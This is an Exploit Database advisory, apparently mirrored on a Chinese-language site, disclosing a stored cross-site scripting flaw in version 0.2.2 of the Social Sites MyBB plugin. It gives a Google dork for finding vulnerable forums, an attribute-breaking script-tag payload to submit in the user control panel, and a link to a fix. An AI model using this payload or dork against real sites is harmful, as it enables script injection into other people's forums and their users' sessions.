Social Sites MyBB Plugin 0.2.2 – Cross-Site Scripting

• Exploit Database
• 12 阅读

• 作者： s3m00t
  日期： 2012-12-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/23382/

• # Exploit Title: Social Sites MyBB Plugin 0.2.2 Cross Site Scripting
  # Google Dork: inurl:usercp.php?action=socialsites
  # Date: 13.12.2012
  # Exploit Author: s3m00t
  # Vendor Homepage: http://mattrogowski.co.uk/mybb/
  # Software Link: http://mods.mybb.com/view/social-sites
  # Version: 0.2.2
  # Tested on: PHP
  
  Reason:
  Lack of input validation at several places.
  
  Proof of Concept:
  1. Navigate to "usercp.php?action=socialsites" and you will see a number of
  fields as http://i.imgur.com/0tz98.png.
  2. Submit below input into any of the field:
  " /><script>alert(1)</script><img src="https://www.exploit-db.com/exploits/23382/
  3. The input will be stored as shown at http://i.imgur.com/Z8bYM.png
  
  Solution:
  Replace the content of "inc/plugins/socialsites.php" with this script:
  http://pastebin.com/5JLdg4gh